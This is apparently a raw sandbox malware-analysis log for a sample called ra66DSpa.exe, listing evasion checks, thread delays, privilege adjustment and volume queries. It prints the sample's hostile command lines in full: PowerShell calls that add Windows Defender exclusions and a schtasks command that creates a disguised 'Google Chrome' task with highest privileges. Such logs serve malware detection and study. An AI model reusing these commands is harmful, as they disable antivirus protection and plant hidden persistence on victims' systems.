            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\ra66DSpa.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\ra66DSpa.exe Memory allocated: B40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ra66DSpa.exe Memory allocated: 1A9D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Memory allocated: 11A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Memory allocated: 1AC50000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Memory allocated: 12B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Memory allocated: 1AE90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Memory allocated: ED0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Memory allocated: 1AB90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Memory allocated: 1370000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Memory allocated: 1B040000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ra66DSpa.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ra66DSpa.exe Window / User API: threadDelayed 9617
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5590
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4278
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5599
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4148
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5851
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3923
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7125
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2605
            Source: C:\Users\user\Desktop\ra66DSpa.exe TID: 5588 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144 Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304 Thread sleep count: 5599 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304 Thread sleep count: 4148 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3852 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6280 Thread sleep count: 5851 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6276 Thread sleep count: 3923 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1592 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\AppData\Local\Google Chrome.exe TID: 988 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Google Chrome.exe TID: 1132 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Google Chrome.exe TID: 5960 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Google Chrome.exe TID: 6596 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\ra66DSpa.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\ra66DSpa.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Google Chrome.exeThread delayed: delay time: 922337203685477
            Source: ra66DSpa.exe, 00000000.00000002.3383710805.000000001BA30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Google Chrome.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ra66DSpa.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Queries volume information: C:\Users\user\Desktop\ra66DSpa.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
